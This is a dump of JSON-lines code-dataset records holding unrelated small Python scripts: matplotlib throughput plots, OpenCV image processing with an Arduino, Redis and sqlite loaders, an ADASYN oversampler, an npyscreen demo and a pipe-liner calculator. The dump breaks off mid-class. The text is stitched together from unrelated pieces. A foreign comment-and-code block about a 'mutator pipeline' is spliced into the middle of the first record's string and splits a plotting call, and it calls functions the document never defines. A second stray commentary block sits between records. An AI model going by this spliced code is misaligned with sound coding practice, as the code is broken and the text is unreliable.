+{"seq_id":"257053137","text":"import numpy as np\nimport matplotlib.pyplot as plt\n\ninput = open(\"throughput_ins.csv\", 'r', encoding='utf-8')\n\nkey = []\nva = []\nfb_va_ss = []\nfb_std_ss = []\nfb_va = []\nfb_std = []\nbloom = []\n\nfor line in input.readlines():\n if line.find('occ') != -1: continue\n cur_line = line.strip()\n row = [0, 0, 0, 0, 0, 0, 0]\n row[0], row[1], row[2], row[3], row[4], row[5], row[6] = map(float, cur_line.split(',')[0:-1])\n key.append(row[0])\n va.append(row[1])\n bloom.append(row[2])\n fb_va_ss.append(row[3])\n fb_std_ss.append(row[4])\n fb_va.append(row[5])\n fb_std.append(row[6])\n\nkey = np.array(key)\nva = np.array(va)\nfb_va_ss = np.array(fb_va_ss)\nfb_std_ss = np.array(fb_std_ss)\nfb_va = np.array(fb_va)\nfb_std = np.array(fb_std)\nbloom = np.array(bloom)\n\nprint(fb_std_ss)\n\nplt.figure(figsize = (12, 9))\nplt.plot(key, fb_std, marker = \"+\", label = \"CF\", markersize = 12)\nplt.plot(key, fb_va, marker = \"*\", label = \"VF\", markersize = 12)\nplt.plot(key, bloom, marker = \"s\", label = \"BF\", markersize = 12)\nplt.plot(key, fb_std_ss, marker = \"v\", label = \"CF-ss (Padding)\", markersize = 12)\nplt.plot(key, fb_va_ss, marker = \"^\", label = \"VF-ss (Padding)\", markersize = 12)\nplt.plot(key, va, marker = \"o\", label 
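# An end-to-end sketch of the mutator pipeline above, assuming the helpers in
# this module are in scope: the first mutator runs in place, the second forks
# a mutated copy of every frame, so 2 inputs yield 4 outputs. (Note the
# collections.Sequence check predates its move to collections.abc.)
import pandas as pd

base = pd.DataFrame({'total_bytes': [100, 200], 'num_packets': [10, 20]},
                    index=['tcp', 'udp'])

mutated = mutate_baselines([base, base.copy()],
                           [sizes_mult_mutator(2), shuffle_protocols_mutation],
                           inplace_mutations=[True, False])
print(len(mutated))   # 4: two size-doubled frames plus two shuffled copies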
= \"VF-ss (No Padding)\", markersize = 12)\n\nplt.legend(loc = \"best\", fontsize = 28, ncol = 2)\nplt.xlabel(\"Occupancy\", fontsize = 28)\n#plt.ylabel(\"Bits per Item\")\nplt.ylabel(\"Insert Throughput (MOPS)\", fontsize = 28)\n\n#t = key[-1]\n#xtick = np.linspace(float(key[0]), float(t), 8)\n#print(xtick)\nplt.xlim((-0.03, 1))\nplt.xticks(np.linspace(0, 1, 5), fontsize = 28)\nplt.yticks(np.linspace(0, 25, 6), fontsize = 28)\n\n#ytick = np.linspace(float(sscf12[0]), float(sscf12[-1]), 10)\n#print(ytick)\n#plt.ylim((sscf12[0], sscf12[-1]))\n#plt.yticks(ytick)\n\nplt.savefig(\"ins-throughput.png\")\n#plt.show()\n\nexit()\n\nplt.semilogx(w, bf, lw = 1.5, linestyle = \"--\", label = \"Bloom Filter\")\n#plt.semilogx(w, vf, lw = 1.5, label = \"Vacuum Filter\")\n#plt.semilogx(w, cf_best, lw = 1.5, linestyle = \"-.\", label = \"Cuckoo Filter Best Case\")\nplt.semilogx(w, vf, lw = 1.5, color = \"black\", label = \"Vacuum Filter / CF Best Case\")\nplt.semilogx(w, cf_avg, lw = 1.5, linestyle = \"-\", label = \"Cuckoo Filter Average Case\")\nplt.semilogx(w, cf_worst, lw = 1.5, label = \"Cuckoo Filter Worst Case\")\nplt.semilogx(w, low_bound, lw = 1, linestyle = \":\", color = \"black\", label = \"Lower Bound\")\nplt.xlabel(\"False Postive Rate\")\nplt.ylabel(\"Bits per Item\")\nplt.legend(loc = \"upper right\")\nplt.show()\n\nexit()\n\n#print(abs_time)\nprint(velocity)\n#print(height)\nplt.subplot(4, 1, 1)\nplt.plot(abs_time, a_z)\nplt.ylabel('Acceleration : m/s^2')\n\nplt.subplot(4, 1, 2)\nplt.plot(abs_time, velocity)\nplt.ylabel('Velocity : m/s')\n\nplt.subplot(4, 1, 3)\nplt.plot(abs_time, height)\nplt.ylabel('Height : m')\n\nplt.subplot(4, 1, 4)\nplt.plot(abs_time, h)\nplt.ylabel('Height_M : m')\n\nplt.xlabel('time : s')\nplt.show()\n\n","sub_path":"Figures/gen-ins.py","file_name":"gen-ins.py","file_ext":"py","file_size_in_byte":2881,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"2735808","text":"import numpy as np\nimport cv2\nimport math\nimport serial\narduino = serial.Serial('COM6', 9600)\n# arduino = serial.Serial('COM5', 9600)\nchup =0;\ncap = cv2.VideoCapture(0)\ncap.set(3,640)\ncap.set(4,480)\ntong=0\ndata=0\ndef pythonreply(para):\n msg = str(para)\n arduino.write(bytes(msg))\n print(msg)\nwhile True:\n length=0\n ret, img = cap.read()\n data = arduino.read()\n data = str(data)\n key = cv2.waitKey(10) \n ret, img = cap.read()\n if img is None:\n break\n gray = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)\n edges = cv2.Canny(gray, 200, 220)\n lines = cv2.HoughLinesP(edges, 1, math.pi/1, 10, 10, 2, 350);\n\n dot1 = (lines[0][0][0],lines[0][0][1])\n dot2 = (lines[0][0][2],lines[0][0][3])\n cv2.line(img, dot1, dot2, (0,0,255), 3)\n cv2.imshow(\"output\", img)\n # print (length)\n key = cv2.waitKey(10)\n \n if key == 27:\n break\n if data==\"c\":\n gray = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)\n edges = cv2.Canny(gray, 100, 120)\n lines = cv2.HoughLinesP(edges, 1, math.pi/1, 20, None, 2, 480);\n\n dot1 = (lines[0][0][0],lines[0][0][1])\n dot2 = (lines[0][0][2],lines[0][0][3])\n cv2.line(img, dot1, dot2, (0,0,255), 3)\n cv2.imshow(\"output\", img)\n length = lines[0][0][1] - lines[0][0][3] \n print(length)\n if(length<180 or length>220):\n print(\"khong dat\")\n pythonreply(0)\n data=\"kc\"\n elif(length>=180 and length<=220):\n print(\"dat\")\n pythonreply(1)\n data=\"kc\" \n length=0 \ncv2.destroyAllWindows() 
\ncv2.VideoCapture(0).release()","sub_path":"ImageProcessing.py","file_name":"ImageProcessing.py","file_ext":"py","file_size_in_byte":1637,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"324819168","text":"from tkinter import *\n\nclass Window(Frame):\n def __init__(self, master = None):\n Frame.__init__(self, master = None)\n self.master = master\n self.init_window()\n\n def init_window(self):\n self.master.title(\"Main Menu\")\n self.pack(fill=BOTH, expand = 1)\n\n logoutButton = Button(self, text = \"Log Out\")\n logoutButton.place(x = 740, y = 10)\n\n \n\n\nroot = Tk()\nroot.geometry(\"800x450\")\napp = Window(root)\nroot.mainloop()","sub_path":"UI/studentMenu.py","file_name":"studentMenu.py","file_ext":"py","file_size_in_byte":473,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"419175266","text":"import settings\nimport redis\nimport csv\nimport sys\nimport os\n\ndef ProcessCSVFile(r, csvin):\n\twith open(csvin, 'rt', encoding='utf-8') as csvfile:\n\t\tspamreader = csv.reader(csvfile, delimiter=',', quoting=csv.QUOTE_NONE, )\n\n\t\t# Ignore Row Header\n\t\tnext(spamreader)\n\n\t\tfor row in spamreader:\n\t\t\tProcessCustomerRow(r, row)\n\ndef ProcessCustomerRow(r, row):\n\t# CSV Header\n\t# ID,Company,Contact,ContactTitle,Address,City,Region,PostalCode,Country,Phone,Fax\n\n\t_key = \"customer-country:\" + row[8]\n\t_id = row[0]\n\tr.sadd(_key, _id)\n\nif __name__ == \"__main__\":\n\tprint(\"Reading Customers...\")\n\t_csvPath = os.path.dirname(os.path.dirname(__file__))\n\t_customersCSV = os.path.join(_csvPath, \"CSVs\", \"customers.csv\")\n\n\t# Connect to Redis\n\tr = redis.Redis(host=settings.redisSettings[\"host\"], port=settings.redisSettings[\"port\"], password=settings.redisSettings[\"password\"], db=settings.redisSettings[\"database\"])\n\n\tProcessCSVFile(r, _customersCSV)\n\n\tprint(\"Reading Customers Completed\")\n","sub_path":"Redis-Python/07_Create_Customers_Country_Key.py","file_name":"07_Create_Customers_Country_Key.py","file_ext":"py","file_size_in_byte":971,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"323747464","text":"import numpy as np\nfrom sklearn import neighbors\nimport pandas as pd\nfrom sklearn.model_selection import train_test_split\nimport operator\nfrom statistics import mean\n\n\ndef adasyn(xtrain, ytrain, target_column, class_to_boost, complex_model, nominal, n_neighbors, boost_coef):\n # (xtrain, ytrain, beta, threshold, target_column, boost_coef, K=5)\n # we introduce the parameter class weight\n # it says how many times we want to increase the population of each class\n # df, X_train, y_train, class_weight, \"target\"\n train_dataset = pd.concat([xtrain, ytrain], axis=1, sort=False)\n # print(len(train_dataset))\n # print(train_dataset)\n if class_to_boost == 1:\n train_dataset = train_dataset.sort_values(by=target_column, ascending=False)\n m = int(sum(ytrain))\n # print(m)\n\n else:\n train_dataset = train_dataset.sort_values(by=target_column, ascending=True)\n m1 = int(sum(ytrain))\n # print(m1)\n m = len(ytrain) - m1\n # print(m)\n\n clf = neighbors.KNeighborsClassifier(n_neighbors=n_neighbors)\n clf.fit(xtrain, ytrain)\n\n # Step 2a, if the minority data set is below the maximum tolerated threshold, generate data.\n # Beta is the desired balance level parameter. 
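# The loader above groups customer ids into Redis sets keyed by country via
# SADD, after which membership tests and retrieval come free with the set
# type. Sketch assuming a reachable local Redis (host/port are illustrative):
import redis

r = redis.Redis(host='localhost', port=6379, db=0)
r.sadd('customer-country:Germany', 'ALFKI', 'BLAUS')
print(r.smembers('customer-country:Germany'))            # {b'ALFKI', b'BLAUS'}
print(r.sismember('customer-country:Germany', 'ALFKI'))  # True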
Beta > 1 means u want more of the imbalanced type, vice versa.\n G = boost_coef * m - m\n\n # Step 2b, find the K nearest neighbours of each minority class example in euclidean distance.\n # Find the ratio ri = majority_class in neighbourhood / K\n Ri = []\n Minority_per_xi = []\n for i in range(m):\n xi = xtrain.iloc[i, :]\n # print(xi)\n # Returns indices of the closest neighbours, and return it as a list\n neighbours = clf.kneighbors([xi], n_neighbors=n_neighbors, return_distance=False)[0]\n # print(neighbours)\n # Skip classifying itself as one of its own neighbours\n # neighbours = neighbours[1:]\n\n # Count how many belongs to the majority class\n count = 0\n for value in neighbours:\n if value > m:\n count += 1\n\n # Find all the minority examples\n minority = []\n for value in neighbours:\n # Shifted back 1 because indices start at 0\n if value <= m - 1:\n minority.append(value)\n # print(minority)\n # print(count)\n if len(minority) >= 2:\n Ri.append(count / n_neighbors)\n Minority_per_xi.append(minority)\n elif len(minority) == 1:\n Ri.append(1/n_neighbors)\n Minority_per_xi.append(minority)\n else:\n Ri.append(0)\n Minority_per_xi.append(minority)\n\n # Step 2c, normalize ri's so their sum equals to 1\n Rhat_i = []\n for ri in Ri:\n rhat_i = ri / sum(Ri)\n Rhat_i.append(rhat_i)\n\n # Step 2d, calculate the number of synthetic data examples that will be generated for each minority example\n Gi = []\n for rhat_i in Rhat_i:\n gi = round(rhat_i * G)\n Gi.append(int(gi))\n # print(max(Gi))\n\n l = []\n for group in Minority_per_xi:\n l.append(len(group))\n\n # print(min(l))\n # # Step 2e, generate synthetic examples\n number_of_added_data = 0\n syn_data = []\n\n for i in range(m):\n most_common_nominal = {}\n xi = xtrain.iloc[i, :]\n if len(nominal) >= 1:\n for feature in nominal:\n count = 0\n sum_nominal = 0\n # print(feature)\n for sample in Minority_per_xi[i]:\n # print(sample)\n x_sample = xtrain.iloc[sample, :]\n # print(x_sample)\n # print(type(x_sample))\n #feature_value = x_sample[feature]\n sum_nominal += x_sample[feature]\n\n #if feature_value in count:\n # count[feature_value] += 1\n #else:\n # count[feature_value] = 1\n most_common_nominal[feature] = round(sum_nominal/len(Minority_per_xi[i]))\n #key_max = max(count.items(), key=operator.itemgetter(1))[0]\n #most_common_nominal[feature] = key_max\n # print(\"xi\", xi)\n for j in range(Gi[i]):\n # If the minority list is not empty\n if Minority_per_xi[i]:\n index = np.random.choice(Minority_per_xi[i])\n xzi = xtrain.iloc[index, :]\n si = xi + (xzi - xi) * np.random.uniform(0, 1)\n if len(nominal) >= 1:\n for feature in nominal:\n si[feature] = most_common_nominal[feature]\n syn_data.append(si)\n number_of_added_data += 1\n\n # Build the data matrix\n new_y = []\n for i in range(len(syn_data)):\n new_y.append(int(complex_model.predict([syn_data[i]])))\n\n new_y_df = pd.DataFrame({target_column: new_y})\n new_df = pd.DataFrame(syn_data)\n new_df.reset_index(drop=True, inplace=True)\n new_df = pd.concat([new_df, new_y_df], axis=1)\n\n return new_df\n","sub_path":"adasyn_optimal.py","file_name":"adasyn_optimal.py","file_ext":"py","file_size_in_byte":5089,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"451203732","text":"#!/usr/bin/python\n# -*- coding: utf-8 -*-\n# apt-get install python-tk\n#from Tkinter import *\nimport os, time\nimport weakref\nimport npyscreen\nimport curses\nimport select, os\nfrom npyscreen import MultiLine\n\nclass 
ActionControllerSearch(npyscreen.ActionControllerSimple):\n def create(self):\n self.add_action('^/.*', self.set_search, True)\n\n def set_search(self, command_line, widget_proxy, live):\n self.parent.value.set_filter(command_line[1:])\n self.parent.wMain.values = self.parent.value.get()\n self.parent.wMain.display()\n\nclass MyTextCommandBox(npyscreen.TextCommandBox):\n def __init__(self, screen, \n history=False, \n history_max=100, \n set_up_history_keys=True,\n *args, **keywords):\n super(MyTextCommandBox, self).__init__(screen, history=history, history_max=history_max, \n set_up_history_keys=set_up_history_keys, *args, **keywords)\n self.keypress_timeout = 5\n def set_up_handlers(self):\n super(MyTextCommandBox, self).set_up_handlers()\n self.keypress_timeout = 5\n def pass_control(self, command):\n self.parent.action_controller.process_control(command, weakref.proxy(self))\n def while_waiting(self):\n self.parent.while_waiting()\n\n\nclass FmSearchActive(npyscreen.FormMuttActiveTraditional):\n ACTION_CONTROLLER = ActionControllerSearch\n COMMAND_WIDGET_CLASS = MyTextCommandBox\n\nclass TestApp(npyscreen.NPSApp):\n def main(self):\n F = FmSearchActive()\n F.wStatus1.value = \"Status Line \"\n F.wStatus2.value = \"Second Status Line \"\n F.value.set_values([str(x) for x in range(500)])\n F.wMain.values = F.value.get()\n\n F.edit()\n\n\nif __name__ == \"__main__\":\n App = TestApp()\n App.run()\n","sub_path":"test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":1815,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"198173972","text":"import sqlite3\nfrom pyFCC.archive import parse_fccid\n\n# creates a sqlite database for use with grantee data\ndef create_grantee_table():\n conn = sqlite3.connect('FCC.db')\n c = conn.cursor()\n\n c.execute(\"\"\"DROP TABLE IF EXISTS grantees\"\"\")\n conn.commit()\n\n c.execute('''CREATE TABLE grantees\n (grantee_code int PRIMARY KEY NOT NULL, \n grantee_name text,\n mailing_address text,\n po_box text,\n city text,\n state text,\n country text,\n zip_code text,\n contact_name text,\n date_received text)''')\n conn.commit()\n c.close()\n print(\"Grantee table created in FCC.db\")\n\ndef create_product_table():\n conn = sqlite3.connect('FCC.db')\n c = conn.cursor()\n\n c.execute('''CREATE TABLE IF NOT EXISTS products\n (grantee_code int NOT NULL REFERENCES grantees(grantee_code), \n product_code text,\n url text,\n high_freq text,\n low_freq text,\n version text,\n UNIQUE(grantee_code, product_code, version))''') #version doesn't currently have anything\n conn.commit()\n c.close()\n print(\"Product table created in FCC.db\")\n\n# populates an existing database table with grantee data\ndef populate_grantees(granteeTest):\n conn = sqlite3.connect('FCC.db')\n c = conn.cursor()\n c.executemany('INSERT INTO grantees VALUES (?,?,?,?,?,?,?,?,?,?)', granteeTest)\n conn.commit()\n c.close()\n print(\"Grantee Table populated in FCC.db\")\n\n# populates an existing database table with product data\ndef populate_products(productsTest):\n productList = []\n for key, value in productsTest.items():\n for version, row in enumerate(value, 1):\n detail_url, ID, low, high = row\n appid, productid = parse_fccid(ID)\n row = (appid, productid, detail_url, high, low, version)\n productList.append(row)\n\n conn = sqlite3.connect('FCC.db')\n c = conn.cursor()\n c.executemany('INSERT OR IGNORE INTO products VALUES (?,?,?,?,?,?)', productList)\n conn.commit()\n c.close()\n print(\"Product Table populated in 
FCC.db\")\n\n","sub_path":"pyFCC/fccDB.py","file_name":"fccDB.py","file_ext":"py","file_size_in_byte":2261,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"355046435","text":"# coding: UTF-8\r\n# keycode_microtime.csvから入力されたキーコードと入力時間keycのデータを読み込み、画像処理によりどの指で押されたかの情報を取得して付加し、keycode_microtime_finger.csvへ出力\r\nimport numpy as np\r\nimport cv2\r\nimport csv\r\nimport random\r\nimport sys\r\nimport math\r\n\r\n# なんか謎のエラー https://stackoverflow.com/questions/21296475/python-dateutil-unicode-warning を防止\r\nimport warnings\r\nwarnings.filterwarnings(\"ignore\", category=UnicodeWarning)\r\n\r\nFPS = 30\r\nMOVIENAME = './IMG_0945.MOV'\r\n\r\nwhere_key = {}\r\nwhere_key['q'] = [295, 378]\r\nwhere_key['w'] = [420, 380]\r\nwhere_key['e'] = [540, 382]\r\nwhere_key['r'] = [665, 385]\r\nwhere_key['t'] = [787, 386]\r\nwhere_key['y'] = [913, 388]\r\nwhere_key['u'] = [1040, 390]\r\nwhere_key['i'] = [1166, 392]\r\nwhere_key['o'] = [1294, 396]\r\nwhere_key['p'] = [1423, 397]\r\nwhere_key['a'] = [340, 487]\r\nwhere_key['s'] = [458, 489]\r\nwhere_key['d'] = [578, 490]\r\nwhere_key['f'] = [696, 494]\r\nwhere_key['g'] = [818, 497]\r\nwhere_key['h'] = [939, 500]\r\nwhere_key['j'] = [1062, 502]\r\nwhere_key['k'] = [1186, 506]\r\nwhere_key['l'] = [1310, 508]\r\nwhere_key['z'] = [415, 595]\r\nwhere_key['x'] = [530, 594]\r\nwhere_key['c'] = [647, 597]\r\nwhere_key['v'] = [765, 602]\r\nwhere_key['b'] = [882, 604]\r\nwhere_key['n'] = [999, 607]\r\nwhere_key['m'] = [1119, 610]\r\n\r\nneiborhood8 = np.array([\r\n [1, 1, 1],\r\n [1, 1, 1],\r\n [1, 1, 1]],\r\n np.uint8)\r\n\r\ndef erode(img):\r\n img_erosion = cv2.erode(img, neiborhood8, iterations=30)\r\n return img_erosion\r\n \r\ndef erode2(img):\r\n img_erosion = cv2.erode(img, neiborhood8, iterations=15)\r\n return img_erosion\r\n \r\ndef dilate(img):\r\n img_dilation = cv2.dilate(img, neiborhood8, iterations=10)\r\n return img_dilation\r\n\r\ndef color(img, color):\r\n hsv_img = cv2.cvtColor(img, cv2.COLOR_BGR2HSV) # hsv形式\r\n # 取得する色の範囲を指定\r\n # color: blue, pink, green\r\n if color == 'blue':\r\n lower = np.array([80, 80, 70])\r\n upper = np.array([116, 255, 255])\r\n elif color == 'green':\r\n lower = np.array([20, 40, 30])\r\n upper = np.array([90, 255, 255])\r\n\r\n # 指定した色に基づいたマスクの生成\r\n img_mask = cv2.inRange(hsv_img, lower, upper)\r\n # 画像とマスクの共通の領域を抽出\r\n return cv2.bitwise_and(img, img, mask=img_mask)\r\n\r\ndef map_cog(src, img):\r\n thresh = 30\r\n\r\n binary = cv2.threshold(cv2.cvtColor(src, cv2.COLOR_BGR2GRAY), thresh, 255, cv2.THRESH_BINARY)[1] # 2値化\r\n n, label, contours, cogs = cv2.connectedComponentsWithStats(binary)\r\n print(n)\r\n\r\n # 重心\r\n cog_positions = []\r\n for i in range(n):\r\n # skip overall cog\r\n if i==0:\r\n continue\r\n\r\n cog_pos = [int(cogs[i][0]), int(cogs[i][1])]\r\n cog_positions.append(cog_pos)\r\n img = cv2.circle(img, (int(cogs[i][0]), int(cogs[i][1])), 10, (0, 0, 255), -1)\r\n return cog_positions\r\n\r\ndef dst_double(src, dst):\r\n return math.sqrt((dst[0] - src[0])**2 + (dst[1] - src[1])**2)\r\n\r\n# 画像フレームから運指を取得\r\ndef get_finger_id(arg_keycode, arg_frame):\r\n # タイミングに応じてframeをcaptureしてimread\r\n if chr(arg_keycode) == ' ':\r\n return 4\r\n img = arg_frame\r\n height = img.shape[0]\r\n width = img.shape[1]\r\n cv2.rectangle(img, (int(width), int(height/3)), (width-1, height-1), (255, 255, 255), -1)\r\n\r\n target_key_position = [where_key[chr(arg_keycode)][0], where_key[chr(arg_keycode)][1]] # test\r\n\r\n\r\n # img = cv2.circle(img, (50, 200), 20, (0, 0, 
255), -1)\r\n\r\n blue_part_pre = color(img, 'blue')\r\n green_part_pre = color(img, 'green')\r\n cv2.namedWindow(\"blue_part_hsv\")\r\n cv2.imshow(\"blue_part_hsv\", blue_part_pre)\r\n # cv2.resizeWindow('blue_part_hsv', 1280, 720)\r\n cv2.namedWindow(\"green_part_hsv\")\r\n cv2.imshow(\"green_part_hsv\", green_part_pre)\r\n # cv2.resizeWindow('green_part_hsv', 1280, 720)\r\n\r\n blue_part = erode(color(img, 'blue'))\r\n blue_part = dilate(blue_part)\r\n green_part = erode2(color(img, 'green'))\r\n\r\n #cv2.rectangle(green_part, (width, height/4), (width-1, height-1), (0, 0, 0), -1)\r\n\r\n # 重心をもとに各指の位置同定\r\n blue_cog_positions = np.sort(map_cog(blue_part, img), axis=0)\r\n green_cog_positions = np.sort(map_cog(green_part, img), axis=0)\r\n print(blue_cog_positions)\r\n print(green_cog_positions)\r\n\r\n thresh = 30\r\n\r\n binary_blue = cv2.threshold(cv2.cvtColor(blue_part, cv2.COLOR_BGR2GRAY), thresh, 255, cv2.THRESH_BINARY)[1] # 2値化\r\n # binary_blue = cv2.bitwise_not(blue_part)\r\n cv2.namedWindow(\"binary_blue\")\r\n \r\n cv2.imshow(\"binary_blue\", binary_blue)\r\n # cv2.resizeWindow('binary_blue', 1280, 720)\r\n\r\n binary_green = cv2.threshold(cv2.cvtColor(green_part, cv2.COLOR_BGR2GRAY), thresh, 255, cv2.THRESH_BINARY)[1] # 2値化\r\n # binary_green = cv2.bitwise_not(green_part)\r\n cv2.namedWindow(\"binary_green\")\r\n \r\n cv2.imshow(\"binary_green\", binary_green)\r\n # cv2.resizeWindow('binary_green', 1280, 720)\r\n\r\n # さらにそのタイミングでのキー位置を取得\r\n\r\n # graphic\r\n WINDOW_1 = \"erode30_blue\"\r\n WINDOW_2 = \"erode15_green\"\r\n WINDOW_3 = \"detect\"\r\n #WINDOW_4 = \"4\"\r\n #WINDOW_5 = \"5\"\r\n cv2.namedWindow(WINDOW_1)\r\n cv2.namedWindow(WINDOW_2)\r\n cv2.namedWindow(WINDOW_3)\r\n #cv2.namedWindow(WINDOW_4)\r\n #cv2.namedWindow(WINDOW_5)\r\n \r\n cv2.imshow(WINDOW_1, blue_part)\r\n cv2.imshow(WINDOW_2, green_part)\r\n cv2.imshow(WINDOW_3, img)\r\n # cv2.resizeWindow(WINDOW_1, 1280, 720)\r\n # cv2.resizeWindow(WINDOW_2, 1280, 720)\r\n # cv2.resizeWindow(WINDOW_3, 1280, 720)\r\n cv2.waitKey(0)\r\n cv2.destroyAllWindows()\r\n\r\n # 適切なキーに最も近い指を確定\r\n if blue_cog_positions.shape[0] != 4 or green_cog_positions.shape[0] != 4:\r\n return -1\r\n\r\n r_ko = blue_cog_positions[0]\r\n r_ks = green_cog_positions[0]\r\n r_na = blue_cog_positions[1]\r\n r_hi = green_cog_positions[1]\r\n l_hi = blue_cog_positions[2]\r\n l_na = green_cog_positions[2]\r\n l_ks = blue_cog_positions[3]\r\n l_ko = green_cog_positions[3]\r\n\r\n arr = np.array([dst_double(r_ko, target_key_position),\r\n dst_double(r_ks, target_key_position),\r\n dst_double(r_na, target_key_position),\r\n dst_double(r_hi, target_key_position),\r\n 9999999.9,\r\n 9999999.9,\r\n dst_double(l_hi, target_key_position),\r\n dst_double(l_na, target_key_position),\r\n dst_double(l_ks, target_key_position),\r\n dst_double(l_ko, target_key_position)])\r\n\r\n print(arr)\r\n print(arr.argmin())\r\n\r\n\r\n\r\n return arr.argmin()\r\n\r\n# csvファイルハンドラ\r\nfr = open('douga_keycode_microtime.csv', 'rb')\r\nfw = open('keycode_microtime_finger.csv', 'w')\r\ndataReader = csv.reader(fr)\r\ndataWriter = csv.writer(fw, lineterminator='\\n')\r\n\r\n# キーコードと入力時間のデータを格納する辞書の配列\r\nkeycode_microtimes = []\r\nfor (i, row) in enumerate(dataReader):\r\n keycode_microtimes.append({})\r\n keycode_microtimes[i]['keycode'] = int(row[0])\r\n keycode_microtimes[i]['microtime'] = int(row[1])\r\n keycode_microtimes[i]['isCorrect'] = int(row[2])\r\n\r\n\r\n# strを数値形式にする & 入力時間をフレームに変��\r\nfor keycode_microtime in keycode_microtimes:\r\n keycode_microtime['keycode'] 
= keycode_microtime['keycode']\r\n keycode_microtime['frame'] = int(round(float(keycode_microtime['microtime']) / 1000000.0 * FPS))\r\n\r\n#### ここから、動画の入力開始位置合わせ (usage: 入力開始位置フレームでqを押す。 入力開始位置フレームじゃない時はq以外を押すと次のフレームへ移動する。)\r\ncap = cv2.VideoCapture(MOVIENAME)\r\n\r\n# cv2.namedWindow('image', cv2.WINDOW_NORMAL)\r\n# cv2.resizeWindow('image', 1280, 720)\r\n\r\nframecount = 0\r\nwhile(cap.isOpened()):\r\n # 1フレーム読む\r\n ret, frame = cap.read()\r\n \r\n # 読めなかったら抜ける\r\n if ret == False:\r\n break\r\n \r\n # 画面にフレームを表示\r\n cv2.namedWindow('image', cv2.WINDOW_NORMAL)\r\n \r\n\r\n cv2.imshow('image', frame)\r\n # cv2.resizeWindow('image', 1280, 720)\r\n \r\n # qが押されたら抜ける(入力開始位置)、q以外を押すと次のフレームへ\r\n inputkeycode = cv2.waitKey(0)\r\n if inputkeycode == 113:\r\n break\r\n \r\n framecount += 1\r\n\r\n# 入力開始位置分だけフレーム数をオフセット\r\nfor keycode_microtime in keycode_microtimes:\r\n keycode_microtime['frame'] += framecount\r\n\r\ncap.release()\r\n\r\ncv2.destroyAllWindows()\r\n\r\ncap = cv2.VideoCapture(MOVIENAME)\r\n\r\n#### ここから、入力に対応する画像フレームから画像処理で運指情報を抜き出し\r\nframecount = 0\r\n# 今何個目のキー入力まで運指情報取得が終わったか\r\nkeycode_microtimes_count = 0\r\nbreakflag = 0\r\nwhile(cap.isOpened()):\r\n # 1フレーム読む\r\n ret, frame = cap.read()\r\n \r\n # 読めなかったら抜ける\r\n if ret == False:\r\n break\r\n \r\n while keycode_microtimes_count < len(keycode_microtimes) and framecount == keycode_microtimes[keycode_microtimes_count]['frame'] :\r\n # 画像処理して運指を取得\r\n keycode_microtimes[keycode_microtimes_count]['finger_id'] = get_finger_id(keycode_microtimes[keycode_microtimes_count]['keycode'], frame)\r\n windowname = chr(keycode_microtimes[keycode_microtimes_count]['keycode'])\r\n # cv2.namedWindow(windowname, cv2.WINDOW_NORMAL)\r\n # cv2.resizeWindow(windowname, 1280, 720)\r\n # cv2.imshow(windowname, frame)\r\n # inputkeycode = cv2.waitKey(0)\r\n # if inputkeycode == 27:\r\n # breakflag = 1\r\n # break\r\n # cv2.destroyAllWindows()\r\n keycode_microtimes_count += 1\r\n if breakflag == 1:\r\n break\r\n framecount += 1\r\n \r\n\r\n#### CSVへ書き出し\r\nfor i in xrange(0, len(keycode_microtimes)): \r\n csv_writerow = []\r\n csv_writerow.append(keycode_microtimes[i]['keycode'])\r\n csv_writerow.append(keycode_microtimes[i]['microtime'])\r\n csv_writerow.append(keycode_microtimes[i]['isCorrect'])\r\n csv_writerow.append(keycode_microtimes[i]['frame'])\r\n csv_writerow.append(keycode_microtimes[i]['finger_id'])\r\n dataWriter.writerow(csv_writerow)\r\n\r\nfr.close()\r\nfw.close()\r\n \r\ncv2.destroyAllWindows()","sub_path":"TypeFingerDetector/TypeFingerDetector/Release/demo_imageProcessing.py","file_name":"demo_imageProcessing.py","file_ext":"py","file_size_in_byte":10373,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"626611322","text":"from math import trunc, exp, pi\n\nclass LinerManager(object):\n '''Instances of the LinerManager class take a dictionary of keys and\n values and determine the thickness of the CIPP liner'''\n # Standard live load table for AASHTO H20 highway loads,# Cooper E-80\n # rail, or 180 kip airplane gear load. 
Impact factors have already been\n # integrated.\n live_load_hwy = {\n 2:5.56, 3:4.17, 4:2.78, 5:1.74, 6:1.39, 7:1.22, 8:0.69\n }\n live_load_rail = {\n 2:26.39, 3:23.61, 4:18.4, 5:16.67, 6:15.63, 7:12.15,\n 8: 11.11, 10:7.64, 12:5.56, 14:4.17, 16:3.47, 18:2.78,\n 20:2.08, 22:1.91, 24:1.74, 26:1.39, 28:1.04, 30:0.69\n }\n live_load_arpt = {\n 2:13.14, 3:12.28, 4:11.27, 5:10.09, 6:8.79, 7:7.85,\n 8:6.93, 10:6.09, 12:4.76, 14:3.06, 16:2.29, 18:1.91,\n 20:1.53, 22:1.14, 24:1.05\n }\n \n def __init__(self, vardict):\n # The enhancement_factor and soil_mod are submitted exclusivly with\n # the dictionary. The following if statements prevent key failures\n if 'enhancement_factor' not in vardict:\n vardict['enhancement_factor'] = ''\n if 'soil_mod' not in vardict:\n vardict['soil_mod'] = ''\n \n # If value is left blank, assume default (ASTM)\n\n default_values = {\n 'design_modulus':250000, 'design_flexural_strength':4500,\n 'safety_factor':2.0, 'ret_factor':50, 'ovality':3.0,\n 'enhancement_factor':7.0, 'gw_level':0.0, 'soil_density':140,\n 'poissons':0.3, 'soil_mod':700, 'n_host':0.013, 'n_liner':0.010,\n 'host_age':50\n }\n \n for key, value in vardict.items():\n if vardict[key] == '':\n vardict[key] = default_values[key]\n \n #tempvardict = {}\n \n #for key, value in vardict.items():\n #tempvardict['self.'+key] = 